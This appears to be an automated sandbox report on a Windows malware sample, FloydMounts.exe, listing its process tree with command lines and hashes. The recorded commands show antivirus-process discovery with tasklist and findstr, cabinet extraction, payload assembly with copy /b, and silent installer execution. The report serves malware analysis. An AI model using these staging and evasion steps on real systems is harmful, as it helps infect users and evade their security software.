                                                                                            Data Ascii: 2@Dest@Countb(JCopySelf2@Src(M@Dest@StartIndex@Countb(JCopySelf`M@Src@StartIndex2@Dest@Countb(JCopyS


                                                                                            Statistics

                                                                                            CPU Usage

                                                                                            Click to jump to process

                                                                                            Memory Usage

                                                                                            Click to jump to process

                                                                                            High Level Behavior Distribution

                                                                                            Click to dive into process behavior distribution

                                                                                            Behavior

                                                                                            Click to jump to process

                                                                                            System Behavior

                                                                                            General

                                                                                            Target ID:0
                                                                                            Start time:04:10:54
                                                                                            Start date:27/12/2024
                                                                                            Path:C:\Users\user\Desktop\FloydMounts.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\FloydMounts.exe"
                                                                                            Imagebase:0x400000
                                                                                            File size:1'391'572 bytes
                                                                                            MD5 hash:A3E3A09C63C5270AC7E96A7B25034335
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:1
                                                                                            Start time:04:10:55
                                                                                            Start date:27/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /c move Blvd Blvd.cmd & Blvd.cmd
                                                                                            Imagebase:0x240000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:2
                                                                                            Start time:04:10:55
                                                                                            Start date:27/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:3
                                                                                            Start time:04:10:55
                                                                                            Start date:27/12/2024
                                                                                            Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:tasklist
                                                                                            Imagebase:0xff0000
                                                                                            File size:79'360 bytes
                                                                                            MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:4
                                                                                            Start time:04:10:55
                                                                                            Start date:27/12/2024
                                                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:findstr /I "opssvc wrsa"
                                                                                            Imagebase:0xbc0000
                                                                                            File size:29'696 bytes
                                                                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:5
                                                                                            Start time:04:10:56
                                                                                            Start date:27/12/2024
                                                                                            Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:tasklist
                                                                                            Imagebase:0xff0000
                                                                                            File size:79'360 bytes
                                                                                            MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:6
                                                                                            Start time:04:10:56
                                                                                            Start date:27/12/2024
                                                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                            Imagebase:0xbc0000
                                                                                            File size:29'696 bytes
                                                                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:7
                                                                                            Start time:04:10:57
                                                                                            Start date:27/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:cmd /c md 174436
                                                                                            Imagebase:0x240000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:8
                                                                                            Start time:04:10:57
                                                                                            Start date:27/12/2024
                                                                                            Path:C:\Windows\SysWOW64\extrac32.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:extrac32 /Y /E Contribute
                                                                                            Imagebase:0x3e0000
                                                                                            File size:29'184 bytes
                                                                                            MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:9
                                                                                            Start time:04:10:58
                                                                                            Start date:27/12/2024
                                                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:findstr /V "nightlife" Consultants
                                                                                            Imagebase:0xbc0000
                                                                                            File size:29'696 bytes
                                                                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:10
                                                                                            Start time:04:10:58
                                                                                            Start date:27/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:cmd /c copy /b ..\Share + ..\Crimes + ..\Briefing + ..\Rj + ..\Pierre + ..\Loving U
                                                                                            Imagebase:0x240000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:11
                                                                                            Start time:04:10:58
                                                                                            Start date:27/12/2024
                                                                                            Path:C:\Users\user\AppData\Local\Temp\174436\Produces.com
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:Produces.com U
                                                                                            Imagebase:0x1b0000
                                                                                            File size:947'288 bytes
                                                                                            MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Antivirus matches:
                                                                                            • Detection: 0%, ReversingLabs
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:12
                                                                                            Start time:04:10:58
                                                                                            Start date:27/12/2024
                                                                                            Path:C:\Windows\SysWOW64\choice.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:choice /d y /t 5
                                                                                            Imagebase:0x910000
                                                                                            File size:28'160 bytes
                                                                                            MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:17
                                                                                            Start time:04:12:24
                                                                                            Start date:27/12/2024
                                                                                            Path:C:\Users\user\AppData\Local\Temp\X4PCDQPDT1B8IDPB7SN83.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\X4PCDQPDT1B8IDPB7SN83.exe"
                                                                                            Imagebase:0x2c0000
                                                                                            File size:11'728'114 bytes
                                                                                            MD5 hash:1DBAC9190F7C834BBB99CE9010475856
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:Borland Delphi
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:18
                                                                                            Start time:04:12:25
                                                                                            Start date:27/12/2024
                                                                                            Path:C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmp
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmp" /SL5="$5044E,10753133,845824,C:\Users\user\AppData\Local\Temp\X4PCDQPDT1B8IDPB7SN83.exe"
                                                                                            Imagebase:0x470000
                                                                                            File size:3'367'424 bytes
                                                                                            MD5 hash:A62041070E18901131CBBE7825EC4EC7
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:Borland Delphi
                                                                                            Antivirus matches:
                                                                                            • Detection: 0%, ReversingLabs
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:19
                                                                                            Start time:04:12:26
                                                                                            Start date:27/12/2024
                                                                                            Path:C:\Users\user\AppData\Local\Temp\X4PCDQPDT1B8IDPB7SN83.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\X4PCDQPDT1B8IDPB7SN83.exe" /VERYSILENT
                                                                                            Imagebase:0x2c0000
                                                                                            File size:11'728'114 bytes
                                                                                            MD5 hash:1DBAC9190F7C834BBB99CE9010475856
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:Borland Delphi
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:20
                                                                                            Start time:04:12:27
                                                                                            Start date:27/12/2024
                                                                                            Path:C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmp
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmp" /SL5="$6044E,10753133,845824,C:\Users\user\AppData\Local\Temp\X4PCDQPDT1B8IDPB7SN83.exe" /VERYSILENT
                                                                                            Imagebase:0x650000
                                                                                            File size:3'367'424 bytes
                                                                                            MD5 hash:A62041070E18901131CBBE7825EC4EC7
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:Borland Delphi
                                                                                            Antivirus matches:
                                                                                            • Detection: 0%, ReversingLabs
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:21
                                                                                            Start time:04:13:00
                                                                                            Start date:27/12/2024
                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"timeout" 9
                                                                                            Imagebase:0x7ff7e04e0000
                                                                                            File size:32'768 bytes
                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:22
                                                                                            Start time:04:13:00
                                                                                            Start date:27/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:23
                                                                                            Start time:04:13:09
                                                                                            Start date:27/12/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
                                                                                            Imagebase:0x7ff755400000
                                                                                            File size:289'792 bytes
                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:24
                                                                                            Start time:04:13:09
                                                                                            Start date:27/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:25
                                                                                            Start time:04:13:09
                                                                                            Start date:27/12/2024
                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
                                                                                            Imagebase:0x7ff7314e0000
                                                                                            File size:106'496 bytes
                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:26
                                                                                            Start time:04:13:09
                                                                                            Start date:27/12/2024
                                                                                            Path:C:\Windows\System32\find.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:find /I "wrsa.exe"
                                                                                            Imagebase:0x7ff736000000
                                                                                            File size:17'920 bytes
                                                                                            MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:27
                                                                                            Start time:04:13:09
                                                                                            Start date:27/12/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
                                                                                            Imagebase:0x7ff755400000
                                                                                            File size:289'792 bytes
                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:28
                                                                                            Start time:04:13:09
                                                                                            Start date:27/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:29
                                                                                            Start time:04:13:09
                                                                                            Start date:27/12/2024
                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
                                                                                            Imagebase:0x7ff7314e0000
                                                                                            File size:106'496 bytes
                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:30
                                                                                            Start time:04:13:09
                                                                                            Start date:27/12/2024
                                                                                            Path:C:\Windows\System32\find.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:find /I "opssvc.exe"
                                                                                            Imagebase:0x7ff736000000
                                                                                            File size:17'920 bytes
                                                                                            MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:31
                                                                                            Start time:04:13:09
                                                                                            Start date:27/12/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
                                                                                            Imagebase:0x7ff755400000
                                                                                            File size:289'792 bytes
                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:32
                                                                                            Start time:04:13:09
                                                                                            Start date:27/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:33
                                                                                            Start time:04:13:09
                                                                                            Start date:27/12/2024
                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
                                                                                            Imagebase:0x7ff7314e0000
                                                                                            File size:106'496 bytes
                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:34
                                                                                            Start time:04:13:09
                                                                                            Start date:27/12/2024
                                                                                            Path:C:\Windows\System32\find.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:find /I "avastui.exe"
                                                                                            Imagebase:0x7ff736000000
                                                                                            File size:17'920 bytes
                                                                                            MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:35
                                                                                            Start time:04:13:09
                                                                                            Start date:27/12/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
                                                                                            Imagebase:0x7ff755400000
                                                                                            File size:289'792 bytes
                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:36
                                                                                            Start time:04:13:10
                                                                                            Start date:27/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:37
                                                                                            Start time:04:13:10
                                                                                            Start date:27/12/2024
                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
                                                                                            Imagebase:0x7ff7314e0000
                                                                                            File size:106'496 bytes
                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:38
                                                                                            Start time:04:13:10
                                                                                            Start date:27/12/2024
                                                                                            Path:C:\Windows\System32\find.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:find /I "avgui.exe"
                                                                                            Imagebase:0x7ff736000000
                                                                                            File size:17'920 bytes
                                                                                            MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:39
                                                                                            Start time:04:13:10
                                                                                            Start date:27/12/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
                                                                                            Imagebase:0x7ff755400000
                                                                                            File size:289'792 bytes
                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:40
                                                                                            Start time:04:13:10
                                                                                            Start date:27/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:41
                                                                                            Start time:04:13:10
                                                                                            Start date:27/12/2024
                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
                                                                                            Imagebase:0x7ff7314e0000
                                                                                            File size:106'496 bytes
                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:42
                                                                                            Start time:04:13:10
                                                                                            Start date:27/12/2024
                                                                                            Path:C:\Windows\System32\find.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:find /I "nswscsvc.exe"
                                                                                            Imagebase:0x7ff736000000
                                                                                            File size:17'920 bytes
                                                                                            MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:43
                                                                                            Start time:04:13:11
                                                                                            Start date:27/12/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
                                                                                            Imagebase:0x7ff755400000
                                                                                            File size:289'792 bytes
                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:44
                                                                                            Start time:04:13:11
                                                                                            Start date:27/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:45
                                                                                            Start time:04:13:11
                                                                                            Start date:27/12/2024
                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
                                                                                            Imagebase:0x7ff7314e0000
                                                                                            File size:106'496 bytes
                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:46
                                                                                            Start time:04:13:11
                                                                                            Start date:27/12/2024
                                                                                            Path:C:\Windows\System32\find.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:find /I "sophoshealth.exe"
                                                                                            Imagebase:0x7ff736000000
                                                                                            File size:17'920 bytes
                                                                                            MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:47
                                                                                            Start time:04:13:17
                                                                                            Start date:27/12/2024
                                                                                            Path:C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exe"
                                                                                            Imagebase:0x400000
                                                                                            File size:979'298'672 bytes
                                                                                            MD5 hash:6148379F983034E295E4A943A5F1198F
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:Borland Delphi
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Has exited:true

                                                                                            Disassembly

                                                                                            Reset < >

                                                                                              Execution Graph

                                                                                              Execution Coverage:17.7%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:21%
                                                                                              Total number of Nodes:1482
                                                                                              Total number of Limit Nodes:28
